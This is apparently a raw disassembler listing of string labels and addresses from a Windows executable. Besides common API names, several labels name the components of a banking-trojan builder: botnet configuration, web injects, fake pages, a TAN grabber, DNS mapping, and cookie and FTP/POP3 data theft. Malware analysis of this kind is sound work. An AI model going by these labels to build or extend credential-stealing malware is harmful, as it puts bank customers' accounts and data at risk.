aLstrcpynw 004064E8 aLstrcpyw 004064F4

aLstrcmpia 00406500

aLstrcmpiw 0040650C aReleasemutex 00406518

aOpenmutexw 00406528

aCreatemutexw 00406534 aGetlasterror 00406544

aSetfilepoint_0 00406554

aGetmodulefil_0 00406568 aGetmodulefil_1 0040657C

aCopyfilew 00406590

aSleep 0040659C aGetmodulehandl 004065A4

aGetuserdefau_0 004065B8

aGetversionexw 004065D4

aGettimezoneinf 004065E4

aResetevent 004065FC

aUnmapviewoffil 00406608 aMapviewoffile 00406618

aCreatefilemapp 00406628

aGetfilesizeex 0040663C aGetdrivetypew 0040664C

aGetlogicaldriv 0040665C

aGetcommandline 00406670 aGetprocessheap 00406680

aGetfileattribu 00406690

aGetprocessid 004066A4 aSuspendthread 004066B4

aFreelibrary 004066C4

aOpenthread 004066D0 aResumethread 004066DC

aText 004066F8

aGetthreadconte 00406700 aCreatetimerque 00406714

aFiletimetodosd 0040672C

aFiletimetoloca 00406744 aGetfileinforma 0040675C

aWaitformultipl 00406778

aGetvolumenamef 00406790 aGetoverlappedr 004067B4

aGetenvironme_0 004067C8

aLocalfree 004067E0 aFormatmessagew 004067EC

aWtsqueryuserto 00406FF8

aUserenv_dll 0040700C aCreateenvironm 00407018

aDestroyenviron 00407030 aSeshutdownpriv 00407048

aKdL324j 00407070

aSRefererSSdata 00407084 aDllunregisters 004070BC

aDllregisterser 004070D0

aDllgetclassobj 004070E4

aDllcanunloadno 004070F8

aSyslistview32 00407108

aVersion 00407128 aSoftwareWebmon 00407138

aWmkeeperDataWm 00407160

aKwm 004071F0 aKwmS_S 004071F8

aTxt 0040720C

aSoftwareMicr_1 00407218 aEnabled 00407280

aEnabledv8 00407290

aSIeSessionCook 004072A4

aDlgdirselectco 0041C390

aDlgdirselect_1 0041C3A8 aDlgdirlistw 0041C3C0

aDlgdirlistcomb 0041C3CC

aDlgdirlistco_0 0041C3E0 aDlgdirlista 0041C3F4

aDispatchmess_1 0041C400

aDispatchmess_2 0041C414 aDialogboxparam 0041C428

aDialogboxpar_0 0041C438

aDialogboxindir 0041C448 aDialogboxind_0 0041C460

aDestroywindow 0041C478

aDestroymenu 0041C488 aDestroyicon 0041C494

aDestroycursor 0041C4A0

aDestroycaret 0041C4B0 aDestroyacceler 0041C4C0

aDeletemenu 0041C4D8

aDeferwindowpos 0041C4E4

aDefwindowprocw 0041C4F4

aDefwindowproca 0041C504

aDefmdichildpro 0041C514 aDefmdichildp_0 0041C528

aDefframeprocw 0041C53C

aDefframeproca 0041C54C aDefdlgprocw 0041C55C

aDefdlgproca 0041C568

aDdeuninitializ 0041C574 aDdeunaccessdat 0041C584

aDdesetuserhand 0041C594

aDdesetqualityo 0041C5A8 aDdereconnect 0041C5C0

aDdequerystring 0041C5D0

aDdequerystri_0 0041C5E0 aDdequerynextse 0041C5F0

aDdequeryconvin 0041C604

aDdepostadvise 0041C618 aDdenameservice 0041C628

aDdekeepstringh 0041C638

aDdeinitializew 0041C64C aDdeinitializea 0041C65C

aDdeimpersonate 0041C66C

aDdegetlasterro 0041C684 aDdegetdata 0041C694

aDdefreestringh 0041C6A0

aDdefreedatahan 0041C6B4 aDdeenablecallb 0041C6C8

aDdedisconnectl 0041C6DC

aDdedisconnect 0041C6F0 aDdecreatestrin 0041C700

aDdecreatestr_0 0041C718 aDdecreatedatah 0041C730

aDdeconnectlist 0041C744

aDdeconnect 0041C754 aDdecmpstringha 0041C760

aDdeclienttrans 0041C774

aDdeadddata 0041C78C

aDdeaccessdata 0041C798

aDdeabandontran 0041C7A8

aCreatewindowst 0041C7C0 aCreatewindow_0 0041C7D8

aCreatewindowex 0041C7F0

aCreatewindow_1 0041C800 aCreatepopupmen 0041C810

aCreatemenu 0041C820

aCreatemdiwindo 0041C82C aCreatemdiwin_0 0041C840

aCreateiconindi 0041C854

aCreateiconfrom 0041C868

aSetnamedpipe_0 00420114

aSetmessagewait 0042012C aSetmailslotinf 00420148

aSetlocaleinfow 00420158

aSetlocaleinfoa 00420168 aSetlocaltime 00420178

aSetlasterror_0 00420188

aSethandleinfor 00420198 aSethandlecount 004201B0

aSetfiletime_0 004201C0

aSetfilepoint_1 004201CC aSetfileattri_0 004201DC

aSetfileattri_1 004201F0

aSetfileapistoo 00420204 aSetfileapistoa 00420218

aSetevent_0 0042022C

aSeterrormode 00420238 aSetenvironment 00420248

aSetenvironme_0 00420260

aSetendoffile_0 00420278

aSetdefaultcomm 00420288

aSetdefaultco_0 004202A0

aSetcurrentdire 004202B8 aSetcurrentdi_0 004202D0

aSetconsolewind 004202E8

aSetconsoletitl 00420300 aSetconsoleti_0 00420314

aSetconsoletext 00420328

aSetconsolescre 00420340 aEtconsoleoutpu 0042035D

aSetconsolemode 00420370

aSetconsolecurs 00420380 aSetconsolecu_0 0042039C

aSetconsolectrl 004203B4

aSetconsolecp 004203CC aSetconsoleacti 004203DC

aEtcomputername 004203FD

aSetcomputernam 00420410 aSetcommtimeout 00420424

aSetcommstate 00420434

aSetcommmask 00420444 aSetcommconfig 00420450

aEtcommbreak 00420461

aSetcalendarinf 00420470 aSetcalendari_0 00420484

aSearchpathw 00420498

aSearchpatha 004204A4 aScrollconsoles 004204B0

aCrollconsolesc 004204CD

aRtlfillmemory 004204E8 aResumethread_0 004204F8

aResetwritewatc 00420508 aResetevent_0 00420518

aRequestwakeupl 00420524

aRequestdevicew 0042053C aRemovedirector 00420550

aRemovedirect_0 00420564

aReleasesemapho 00420578

aReleasemutex_0 0042058C

aReadprocessm_0 0042059C

aReadfilescatte 004205B0 aReadfileex 004205C0

aReadfile_0 004205CC

aReaddirectoryc 004205D8 aReadconsolew 004205F0

aReadconsoleo_0 00420600

aReadconsoleout 00420614 aReadconsoleo_1 00420630

aReadconsoleo_2 0042064C

aReadconsoleo_3 00420668

aSelect_0 004072DC

aOptionSelected 004072E8 aInputValue 004072FC

aBofaAnswersS 00407310

a0Uu 00407334 aGrab_S_02u_02u 0040733C

aGrabbedDataFro 00407374

aFtp 004073A8 aPop3 004073AC

aSSS@U_U_U_UU 004073B4

a_h_64ad0625_ 004073EC a__system__64ad 00407408

aMozilla4_0Comp 0040743C

aHttp1_1 00407474 aUrlmon_dll 00407480

aObtainuseragen 0040748C

a?o 004074A4 a?i 004074A8

a?t 004074AC

aCab 004074B0

aCabinet_dll 004074B8

aFcicreate 004074C4

aFciaddfile 004074D0 aFciflushcabine 004074DC

aFcidestroy 004074EC

aBc 00407500 aBuildingBotFil 004188D0

aNotEnoughMemor 004188FC

aStaticconfig 00418920 aFailedToFindEn 00418930

aBotnet 00418998

aBotnetS 004189A0 aBotnetDefault 004189B4

aTimer_config 004189E0

aTimer_configUm 004189F0 aTimer_logs 00418A20

aTimer_logsUmsU 00418A2C

aTimer_stats 00418A58 aTimer_statsUms 00418A64

aUrl_config 00418A94

aCanTFindUrl__0 00418AA0 aUrl_configS 00418ADC

aUrl_compip 00418AF8

aCanTFindUrl_co 00418B04 aUrl_compipS 00418B40

aEncryption_key 00418B5C

aCanTFindEncryp 00418B70 aEncryption_k_0 00418BB4

aBlacklist_lang 00418BD8

aBlacklist_la_0 00418BEC aSourcePeCorrup 00418C20

a_data1 00418C4C aPercent_of_ove 00418C54

aDynamicconfig 00418C68

aUrl_loader 00418C78 String2 00418C84

aFailedToWriteO 00418C94

aBuildSucceeded 00418CD0

Str1 00418CF4

aData_before 00418CFC

aData_inject 00418D0C aData_after 00418D1C

aData_end 00418D2C

aFailedToOpenFi 00418D38 aUS 00418D84

aBadFormatOfWeb 00418D90

aSUS 00418DC4 aFailedToFind_0 00418DD8

aCanTFindUrl_lo 00418E44

aUrl_loaderS 00418E80

aCreateiconfr_0 0041C884

aCreateicon 0041C89C aCreatedialogpa 0041C8A8

aCreatedialog_0 0041C8BC

aCreatedialogin 0041C8D0 aCreatedialog_1 0041C8EC

aCreatedesktopw 0041C908

aCreatedesktopa 0041C918 aCreatecursor 0041C928

aCreatecaret 0041C938

aCreateaccelera 0041C944 aCreateaccele_0 0041C95C

aCountclipboard 0041C974

aCopyrect 0041C98C aCopyimage 0041C998

aCopyicon 0041C9A4

aCopyaccelerato 0041C9B0 aCopyaccelera_0 0041C9C8

aClosewindows_0 0041C9E0

aClosewindow 0041C9F4

aClosedesktop_0 0041CA00

aCloseclipboard 0041CA10

aClipcursor 0041CA20 aClienttoscreen 0041CA2C

aChildwindowfro 0041CA3C

aChildwindowf_0 0041CA54 aCheckradiobutt 0041CA6C

aCheckmenuradio 0041CA80

aCheckmenuitem 0041CA94 aCheckdlgbutton 0041CAA4

aCharupperw_0 0041CAB4

aCharupperbuffw 0041CAC0 aCharupperbuffa 0041CAD0

aCharuppera 0041CAE0

aChartooemw_0 0041CAEC aChartooembuffw 0041CAF8

aChartooembuffa 0041CB08

aChartooema 0041CB18 aCharprevw 0041CB24

aCharprevexa 0041CB30

aCharpreva 0041CB3C aCharnextw 0041CB48

aCharnextexa 0041CB54

aCharnexta 0041CB60 aCharlowerw 0041CB6C

aCharlowerbuffw 0041CB78

aCharlowerbuf_0 0041CB88 aCharlowera 0041CB98

aChangemenuw 0041CBA4

aChangemenua 0041CBB0 aChangedisplays 0041CBBC

aChangedispla_0 0041CBD4 aChangedispla_1 0041CBF0

aChangedispla_2 0041CC0C

aChangeclipboar 0041CC24 aCascadewindows 0041CC3C

aCascadechildwi 0041CC4C

aCallwindowproc 0041CC60

aCallwindowpr_0 0041CC70

aCallnexthookex 0041CC80

aCallmsgfilterw 0041CC90 aCallmsgfiltera 0041CCA0

aCallmsgfilter 0041CCB0

aBroadcastsyste 0041CCC0 aBroadcastsys_0 0041CCD8

aBroadcastsys_1 0041CCF0

aBringwindowtot 0041CD08 aBlockinput 0041CD1C

aBeginpaint 0041CD28

aBegindeferwind 0041CD34

aReadconsoleinp 0042067C

aReadconsolei_0 00420690 aReadconsolea 004206A4

aRaiseexception 004206B4

aQueueuserapc 004206C4 aQueryperform_0 004206D4

aQueryperforman 004206F0

aQuerydosdevice 00420708 aQuerydosdevi_0 00420718

aPurgecomm 00420728

aPulseevent 00420734 aProcess32next 00420740

aProcess32fir_0 00420750

aPreparetape 00420760 aPostqueuedcomp 0042076C

aPeeknamedpipe 00420788

aPeekconsoleinp 00420798 aPeekconsolei_0 004207AC

aOutputdebugstr 004207C0

aOutputdebugs_0 004207D4

aOpenwaitableti 004207E8

aOpenwaitable_0 004207FC

aOpensemaphorew 00420810 aOpensemaphorea 00420820

aOpenprocess_0 00420830

aOpenmutexw_0 0042083C aOpenmutexa 00420848

aOpenfilemappin 00420854

aOpenfilemapp_0 00420868 aOpenfile 0042087C

aOpeneventw 00420888

aOpeneventa 00420894 aMultibytetow_0 004208A0

aMuldiv 004208B4

aMovefilew 004208BC aMovefileexw_0 004208C8

aMovefileexa 004208D4

aMovefilea 004208E0 aModule32next 004208EC

aModule32first 004208FC

aMapviewoffilee 0042090C aMapviewoffil_0 0042091C

aLockresource 0042092C

aLockfileex 0042093C aLockfile 00420948

aLocalunlock 00420954

aLocalsize 00420960 aLocalshrink 0042096C

aLocalrealloc 00420978

aLocallock 00420988 aLocalhandle 00420994

aLocalfree_0 004209A0 aLocalflags 004209AC

aLocalfiletimet 004209B8

aLocalcompact 004209D0 aLocalalloc 004209E0

aLoadresource 004209EC

aLoadmodule 004209FC

aLoadlibraryw 00420A08

aLoadlibraryexw 00420A18

aLoadlibraryexa 00420A28 aLoadlibrarya_0 00420A38

aLcmapstringw 00420A48

aLcmapstringa 00420A58 aIsvalidlocale 00420A68

aIsvalidcodepag 00420A78

aIssystemresume 00420A88 aIsprocessorfea 00420AA0

aIsdebuggerpres 00420ABC

aIsdbcsleadbyte 00420AD0

aUrl_server 00418E9C

aCanTFindUrl_se 00418EA8 aUrl_serverS 00418EE4

aBadAdvancedCon 00418F00

aAdvancedconfig 00418F3C aAdvancedconf_0 00418F4C

aBadWebFilterFo 00418F5C

aWebfilter 00418F8C aWebfilters 00418F98

aBadWebDataFilt 00418FA4

aWebdatafilter 00418FE0 aWebdatafilters 00418FF0

aWebfakes 00419000

aBadWebfakeFoun 0041900C aWebfakeUSS 00419038

aTangrabber 00419064

aBadTanGrabberR 00419070 aTangrabberUS 004190B0

aBadDnsMapFound 004190D4

aDnsmap 00419100

aFile_webinject 00419108

aFile_webinje_0 00419118

aWritingWebInje 00419140 aCfg_bin 00419174

aBuildSucceed_0 00419184

aLoadingConfigF 004191B0 aLoadingSucceed 004191F4

aFailedToLoadCo 0041921C

aConfig_txt 00419254 aTextFiles_txt 00419270

a_txt_0 00419298

aA 004192A2 aLlFiles 004192A4

a_ 004192B8

aBuilder 004192C0 aInformation 004192D0

Name 004192E8

aVira_2109 004192EC aDefault 00419304

aVersionU_U_U_U 00419320

String 004193A8 aRemovingSpywar 004193F0

aRemovingSpyw_0 00419418

Caption 00419474 aSpywareRemoved 00419490

Text 00419510

aLexx 00419584 a13024128_09_20 0041958C

aVersionU_U_U_0 004195C0

a_Pipe 00419618 aErrorS 0041962C

aOle32_dll 00419644 aShlwapi_dll 00419650

aAdvapi32_dll 0041965C

aUser32_dll 0041966C aKernel32_dll 00419678

aWritestringstr 00419688

aWriteolestg 0041969C

aWritefmtuserty 004196A8

aWriteclassstm 004196BC

aWriteclassstg 004196CC aUtgetdvtd32inf 004196DC

aUtgetdvtd16inf 004196EC

aUtconvertdvtd3 004196FC aUtconvertdvtd1 00419714

aUpdatedcomsett 0041972C

aStringfromiid 00419740 aStringfromgu_0 00419750

aStringfromclsi 00419760

aStgsettimes 00419770

aAttachthreadin 0041CD48

aArrangeiconicw 0041CD5C aAppendmenuw 0041CD74

aAppendmenua 0041CD80

aAnypopup 0041CD8C aAnimatewindow 0041CD98

aAdjustwindowre 0041CDA8

aAdjustwindow_0 0041CDBC aUnlockserviced 0041CDD0

aTrusteeaccesst 0041CDE8

aTrusteeacces_0 0041CE00 aStartservicew 0041CE18

aStartservicect 0041CE28

aStartservice_0 0041CE44 aStartservicea 0041CE60

aSettokeninform 0041CE70

aSetthreadtoken 0041CE84 aSetservicestat 0041CE94

aSetserviceobje 0041CEA8

aSetservicebits 0041CEC4

aSetsecurityinf 0041CED4

aSetsecurityi_0 0041CEE8

aSetsecurityi_1 0041CEFC aSetsecurityd_0 0041CF0C

aSetsecurityd_1 0041CF28

aSetsecurityd_2 0041CF44 aSetsecurityd_3 0041CF60

aSetprivateobje 0041CF7C

aSetnamedsecuri 0041CF98 aSetnamedsecu_0 0041CFB0

aSetnamedsecu_1 0041CFC8

aSetnamedsecu_2 0041CFE0 aSetkernelobjec 0041CFF8

aSetfilesecurit 0041D010

aSetfilesecur_0 0041D024 aSetentriesinau 0041D038

aSetentriesin_0 0041D050

aSetentriesinac 0041D068 aSetentriesin_1 0041D07C

aSetentriesin_2 0041D090

aSetentriesin_3 0041D0A8 aSetaclinformat 0041D0C0

aReverttoself 0041D0D4

aReporteventw 0041D0E4 aReporteventa 0041D0F4

aRegisterservic 0041D104

aRegisterserv_0 0041D120 aRegisterevents 0041D13C

aRegistereven_0 0041D154

aRegunloadkeyw 0041D16C aRegunloadkeya 0041D17C

aRegsetvaluew 0041D18C aRegsetvaluee_0 0041D19C

aRegsetvaluee_1 0041D1AC

aRegsetvaluea 0041D1BC aRegsetkeysecur 0041D1CC

aRegsavekeyw 0041D1E0

aRegsavekeya 0041D1EC

aRegrestorekeyw 0041D1F8

aRegrestorekeya 0041D208

aRegreplacekeyw 0041D218 aRegreplacekeya 0041D228

aRegqueryvaluew 0041D238

aRegqueryvalu_0 0041D248 aRegqueryvalu_1 0041D25C

aRegqueryvaluea 0041D270

aRegquerymultip 0041D280 aRegquerymult_0 0041D298

aRegqueryinfoke 0041D2B0

aRegqueryinfo_0 0041D2C4

aIsdbcsleadby_0 00420AE4

aIsbadwritept_0 00420AF4 aIsbadstringptr 00420B04

aIsbadstringp_0 00420B14

aIsbadreadptr_0 00420B24 aIsbadhugewrite 00420B34

aIsbadhugereadp 00420B48

aIsbadcodeptr 00420B5C aInitializecr_0 00420B6C

aInitatomtable 00420B94

aHeapwalk 00420BA4 aHeapvalidate 00420BB0

aHeapunlock 00420BC0

aHeaplock 00420BCC aHeapfree_0 00420BD8

aHeapdestroy_0 00420BE4

aHeapcreate_0 00420BF0 aHeapcompact 00420BFC

aEap32next 00420C09

aHeap32listnext 00420C14

aHeap32listfirs 00420C24

aHeap32first 00420C34

aGlobalwire 00420C40 aGlobalunlock_0 00420C4C

aGlobalunfix 00420C5C

aGlobalunwire 00420C68 aLobalsize 00420C79

aGlobalrealloc 00420C84

aGlobalmemoryst 00420C94 aGloballock_0 00420CA8

aGlobalhandle 00420CB4

aGlobalgetatomn 00420CC4 aGlobalgetato_0 00420CD8

aLobalfree 00420CED

aGlobalflags 00420CF8 aGlobalfix 00420D04

aGlobalfindatom 00420D10

aGlobalfindat_0 00420D20 aGlobaldeleteat 00420D30

aGlobalcompact 00420D44

aGlobalalloc 00420D54 aLobaladdatomw 00420D61

aGlobaladdatoma 00420D70

aGetwritewatch 00420D80 aGetwindowsdire 00420D90

aGetwindowsdi_0 00420DA8

aGetvolumeinfor 00420DC0 aGetvolumeinf_0 00420DD8

aGetversionex_0 00420DF0

aGetversionexa 00420E00 aGetversion 00420E10

aGetuserdefau_1 00420E1C aGetuserdefault 00420E34

aGettimezonei_0 00420E48

aGettimeformatw 00420E60 aGettimeformata 00420E70

aGettickcount_0 00420E80

aGetthreadtimes 00420E90

aGetthreadselec 00420EA0

aGetthreadpri_0 00420EB8

aGetthreadpri_1 00420ED0 aGetthreadlocal 00420EE4

aGetthreadcon_0 00420EF4

aGettemppathw_0 00420F08 aGettemppatha 00420F18

aGettempfilen_0 00420F28

aGettempfilen_1 00420F3C aGettapestatus 00420F50

aGettapepositio 00420F60

aGettapeparamet 00420F70

aStgopenstorage 0041977C

aStgopenstora_0 00419798 aStgopenstora_1 004197AC

aStgopenasyncdo 004197BC

aStgisstorageil 004197E0 aStgisstoragefi 004197F8

aStggetifillloc 0041980C

aStggetifilll_0 00419830 aStgcreatestora 0041984C

aStgcreatedocfi 00419860

aStgcreatedoc_0 00419880 aSetdocumentbit 00419894

aSetconvertstg 004198A8

aRevokedragdrop 004198B8 aReleasestgmedi 004198C8

aRegisterdragdr 004198DC

aReadstringstre 004198F0 aReadolestg 00419904

aReadfmtusertyp 00419910

aReadclassstm 00419924

aReadclassstg 00419934

aPropvariantcop 00419944

aPropvariantcle 00419954 aProgidfromclsi 00419968

aOpenorcreatest 00419978

aOleuninitializ 0041998C aOletranslateac 0041999C

aOlesetmenudesc 004199B4

aOlesetcontaine 004199CC aOlesetclipboar 004199E4

aOlesetautoconv 004199F4

aOlesavetostrea 00419A08 aOlesave 00419A18

aOlerun 00419A20

aOlereggetusert 00419A28 aOlereggetmiscs 00419A3C

aOleregenumverb 00419A50

aOleregenumform 00419A60 aOlequerylinkfr 00419A74

aOlequerycreate 00419A8C

aOlenoteobjectv 00419AA4 aOlemetafilepic 00419ABC

aOlelockrunning 00419ADC

aOleloadfromstr 00419AEC aOleload 00419B00

aOleisrunning 00419B08

aOleiscurrentcl 00419B18 aOleinitialize 00419B30

aOlegeticonoffi 00419B40

aOlegeticonofcl 00419B54 aOlegetclipboar 00419B68

aOlegetautoconv 00419B78 aOleflushclipbo 00419B8C

aOleduplicateda 00419BA0

aOledraw 00419BB4 aOledoautoconve 00419BBC

aOledestroymenu 00419BD0

aOlecreatestati 00419BEC

aOlecreatemenud 00419C04

aOlecreatelinkt 00419C1C

aOlecreatelin_0 00419C34 aOlecreatelinkf 00419C48

aOlecreatelin_1 00419C60

aOlecreatelinke 00419C78 aOlecreatelink 00419C88

aOlecreatefromf 00419C98

aOlecreatefro_0 00419CAC aOlecreatefromd 00419CC0

aOlecreatefro_1 00419CD4

aOlecreateex 00419CE8

aRegopenkeyw 0041D2D8

aRegopenkeyex_0 0041D2E4 aRegopenkeyexa 0041D2F4

aRegopenkeya 0041D304

aRegnotifychang 0041D310 aRegloadkeyw 0041D328

aRegloadkeya 0041D334

aReggetkeysecur 0041D340 aRegflushkey 0041D354

aRegenumvaluew 0041D360

aRegenumvaluea 0041D370 aRegenumkeyw 0041D380

aRegenumkeyex_0 0041D38C

aRegenumkeyexa 0041D39C aRegenumkeya 0041D3AC

aRegdeleteval_0 0041D3B8

aRegdeleteval_1 0041D3C8 aRegdeletekeyw 0041D3D8

aRegdeletekeya 0041D3E8

aRegcreatekeyw 0041D3F8

aRegcreatekey_1 0041D408

aRegcreatekey_2 0041D418

aRegcreatekeya 0041D428 aRegconnectregi 0041D438

aRegconnectre_0 0041D44C

aRegclosekey_0 0041D460 aReadeventlogw 0041D46C

aReadeventloga 0041D47C

aQueryservicest 0041D48C aQueryserviceob 0041D4A0

aQueryservicelo 0041D4BC

aQueryservice_0 0041D4D4 aQueryserviceco 0041D4EC

aQueryservice_1 0041D500

aPrivilegedserv 0041D514 aPrivilegedse_0 0041D534

aPrivilegecheck 0041D554

aOpenthreadtoke 0041D564 aOpenservicew 0041D574

aOpenservicea 0041D584

aOpenscmanagerw 0041D594 aOpenscmanagera 0041D5A4

aOpenprocesst_0 0041D5B4

aOpeneventlogw 0041D5C8 aOpeneventloga 0041D5D8

aOpenbackupeven 0041D5E8

aOpenbackupev_0 0041D5FC aObjectprivileg 0041D610

aObjectprivil_0 0041D62C

aObjectopenaudi 0041D648 aObjectopenau_0 0041D660

aObjectdeleteau 0041D678 aObjectdelete_0 0041D690

aObjectcloseaud 0041D6A8

aObjectclosea_0 0041D6C0 aNotifychangeev 0041D6D8

aNotifybootconf 0041D6F0

aMapgenericmask 0041D708

aMakeselfrelati 0041D718

aMakeabsolutesd 0041D72C

aLookupsecurity 0041D73C aLookupsecuri_0 0041D75C

aLookupprivil_0 0041D77C

aLookupprivil_1 0041D794 aLookupprivil_2 0041D7AC

aLookupprivil_3 0041D7C4

aLookupprivil_4 0041D7DC aLookupprivil_5 0041D7F8

aLookupaccoun_0 0041D814

aLookupaccoun_1 0041D828

aGetsystemtimea 00420F84

aGetsystemtim_0 00420F9C aGetsystemtim_1 00420FB4

aGetsystempower 00420FC4

aGetsysteminfo 00420FDC aGetsystemdirec 00420FEC

aGetsystemdir_0 00421000

aGetsystemdefau 00421014 aGetsystemdef_0 0042102C

aGetstringtypew 00421044

aGetstringtypee 00421054 aGetstringtyp_0 00421068

aGetstringtypea 0042107C

aGetstdhandle 0042108C aGetstartupinfo 0042109C

aGetstartupin_0 004210AC

aGetshortpathna 004210BC aGetshortpath_0 004210D0

aGetqueuedcompl 004210E4

aGetprofilestri 00421100

aGetprofilest_0 00421114

aGetprofilesect 00421128

aGetprofilese_0 0042113C aGetprofileintw 00421150

aGetprofileinta 00421160

aGetprocesswork 00421170 aGetprocessvers 0042118C

aGetprocessti_0 004211A0

aGetprocessshut 004211B0 aGetprocessprio 004211D0

aGetprocesshe_0 004211E8

aGetprocesshe_1 004211F8 aGetprocessaffi 00421208

aGetprocaddre_0 00421220

aGetprivatepr_0 00421230 aGetprivatepr_1 0042124C

aGetprivatepr_2 00421268

aGetprivatepr_3 00421284 aGetprivatepr_4 004212A0

aGetprivatepr_5 004212BC

aGetprivatepr_6 004212DC aGetprivatepr_7 004212FC

aGetprivateprof 00421318

aGetprivatepr_8 00421330 aGetprioritycla 00421348

aGetoverlappe_0 0042135C

aGetoemcp 00421370 aGetnumberofcon 0042137C

aGetnumberofc_0 0042139C

aGetnumberforma 004213BC aGetnumberfor_0 004213D0

aGetnamedpipein 004213E4 aGetnamedpipeha 004213F8

aGetnamedpipe_0 00421414

aGetmodulehan_0 00421430 aGetmodulehan_1 00421444

aGetmodulefil_2 00421458

aGetmodulefil_3 0042146C

aGetmailslotinf 00421480

aGetlongpathnam 00421490

aGetlongpathn_0 004214A4 aGetlogicaldr_0 004214B8

aGetlogicaldr_1 004214CC

aGetlogicaldr_2 004214E4 aGetlocaleinfow 004214FC

aGetlocaleinfoa 0042150C

aGetlocaltime_0 0042151C aGetlasterror_0 0042152C

aGetlargestcons 0042153C

aGethandleinfor 00421558

aOlecreateembed 00419CF4

aOlecreatedefau 00419D10 aOlecreate 00419D28

aOleconvertoles 00419D34

aOleconvertol_0 00419D54 aOleconvertisto 00419D74

aOleconvertis_0 00419D94

aOlebuildversio 00419DB4 aMonikerrelativ 00419DC4

aMonikercommonp 00419DDC

aMkparsedisplay 00419DF4 aIsequalguid 00419E08

aIsaccelerator 00419E14

aIidfromstring 00419E24 aGetrunningobje 00419E34

aGethookinterfa 00419E4C

aGethglobalfrom 00419E60 aGethglobalfr_0 00419E78

aGetdocumentbit 00419E94

aGetconvertstg 00419EA8

aGetclassfile 00419EB8

aFreepropvarian 00419EC8

aEnablehookobje 00419EE0 aDodragdrop 00419EF4

aDlldebugobject 00419F00

aCreatestreamon 00419F18 aCreatepointerm 00419F30

aCreateoleadvis 00419F48

aCreateobjrefmo 00419F60 aCreateitemmoni 00419F74

aCreateilockbyt 00419F88

aCreategenericc 00419FA4 aCreatefilemoni 00419FBC

aCreatedatacach 00419FD0

aCreatedataadvi 00419FE0 aCreateclassmon 00419FF8

aCreatebindctx 0041A00C

aCreateantimoni 0041A01C aCounmarshalint 0041A030

aCounmarshalhre 0041A048

aCouninitialize 0041A05C aCotreatasclass 0041A06C

aCotaskmemreall 0041A07C

aCotaskmemfree 0041A090 aCotaskmemalloc 0041A0A0

aCoswitchcallco 0041A0B0

aCosuspendclass 0041A0C4 aCosetproxyblan 0041A0DC

aCorevokemalloc 0041A0F0

aCorevokeclasso 0041A104 aCoreverttoself 0041A118

aCoresumeclasso 0041A128 aCoreleaseserve 0041A140

aCoreleasemarsh 0041A158

aCoregistersurr 0041A170 aCoregisterpscl 0041A184

aCoregistermess 0041A198

aCoregistermall 0041A1B0

aCoregisterclas 0041A1C4

aCoregisterchan 0041A1DC

aCoqueryrelease 0041A1F4 aCoqueryproxybl 0041A20C

aCoqueryclientb 0041A220

aCoqueryauthent 0041A238 aComarshalinter 0041A258

aComarshalint_0 0041A26C

aComarshalhresu 0041A294 aColockobjectex 0041A2A8

aColoadlibrary 0041A2C0

aCoisole1class 0041A2D0

aLookupaccountn 0041D83C

aLookupaccoun_2 0041D850 aLogonuserw 0041D864

aLogonusera 0041D870

aLockservicedat 0041D87C aIsvalidsid 0041D890

aIsvalidsecurit 0041D89C

aIsvalidacl 0041D8B8 aIstextunicode 0041D8C4

aInitiatesystem 0041D8D4

aInitiatesyst_0 0041D8EC aInitializesid 0041D904

aInitializese_0 0041D914

aInitializeacl 0041D934 aImpersonatesel 0041D944

aImpersonatenam 0041D954

aImpersonatelog 0041D970 aGetusernamew_0 0041D988

aGetusernamea 0041D998

aGettrusteetype 0041D9A8

aGettrusteety_0 0041D9B8

aGettrusteename 0041D9C8

aGettrusteena_0 0041D9D8 aGettokeninfo_0 0041D9E8

aGetsidsubautho 0041D9FC

aGetsidsubaut_0 0041DA14 aGetsidlengthre 0041DA28

aGetsididentifi 0041DA40

aGetservicekeyn 0041DA5C aGetserviceke_0 0041DA70

aGetservicedisp 0041DA84

aGetservicedi_0 0041DA9C aGetsecurityinf 0041DAB4

aGetsecurityi_0 0041DAC8

aGetsecurityi_1 0041DADC aGetsecuritydes 0041DAEC

aGetsecurityd_0 0041DB08

aGetsecurityd_1 0041DB24 aGetsecurityd_2 0041DB40

aGetsecurityd_3 0041DB5C

aGetsecurityd_4 0041DB78 aGetprivateobje 0041DB98

aGetoverlappeda 0041DBB4

aGetoldestevent 0041DBD0 aGetnumberofeve 0041DBE8

aGetnamedsecuri 0041DC04

aGetnamedsecu_0 0041DC1C aGetnamedsecu_1 0041DC34

aGetnamedsecu_2 0041DC4C

aGetmultipletru 0041DC64 aGetmultiplet_0 0041DC78

aGetmultiplet_1 0041DC98 aGetmultiplet_2 0041DCB8

aGetlengthsid 0041DCCC

aGetkernelobjec 0041DCDC aGetfilesecurit 0041DCF4

aGetfilesecur_0 0041DD08

aGetexplicitent 0041DD1C

aGetexplicite_0 0041DD38

aGeteffectiveri 0041DD54

aGeteffective_0 0041DD70 aGetcurrenthwpr 0041DD8C

aGetcurrenthw_0 0041DDA4

aGetauditedperm 0041DDBC aGetauditedpe_0 0041DDDC

aGetaclinformat 0041DDFC

aGetace 0041DE10 aGetaccesspermi 0041DE18

aGetaccessper_0 0041DE38

aFreesid 0041DE58

aGetfullpathnam 00421570

aGetfullpathn_0 00421584 aGetfiletype 00421598

aGetfiletime_0 004215A4

aGetfilesize_0 004215B0 aGetfileinfor_0 004215BC

aGetfileattri_0 004215D8

aGetfileattri_1 004215EC aGetfileattri_2 00421604

aGetfileattri_3 0042161C

aGetexitcodethr 00421630 aGetexitcodep_0 00421644

aGetenvironme_1 00421658

aGetenvironme_2 00421670 aGetenvironment 00421688

aGetenvironme_3 004216A0

aGetenvironme_4 004216B8 aGetdrivetype_0 004216D0

aGetdrivetypea 004216E0

aGetdiskfreespa 004216F0

aGetdiskfrees_0 00421704

aGetdiskfrees_1 00421718

aGetdiskfrees_2 0042172C aGetdevicepower 00421740

aGetdefaultcomm 00421754

aGetdefaultco_0 0042176C aGetdateformatw 00421784

aGetdateformata 00421794

aGetcurrentth_1 004217A4 aGetcurrentth_2 004217B8

aGetcurrentpr_0 004217CC

aGetcurrentpr_1 004217E0 aGetcurrentdire 004217F4

aGetcurrentdi_0 0042180C

aGetcurrencyfor 00421824 aGetcurrencyf_0 00421838

aGetconsoletitl 0042184C

aGetconsoleti_0 00421860 aGetconsolescre 00421874

aGetconsoleoutp 00421890

aGetconsolemode 004218A4 aGetconsolecurs 004218B4

aGetconsolecp 004218CC

aGetcomputern_0 004218DC aGetcomputern_1 004218F0

aGetcompressedf 00421904

aGetcompresse_0 0042191C aGetcommandli_0 00421934

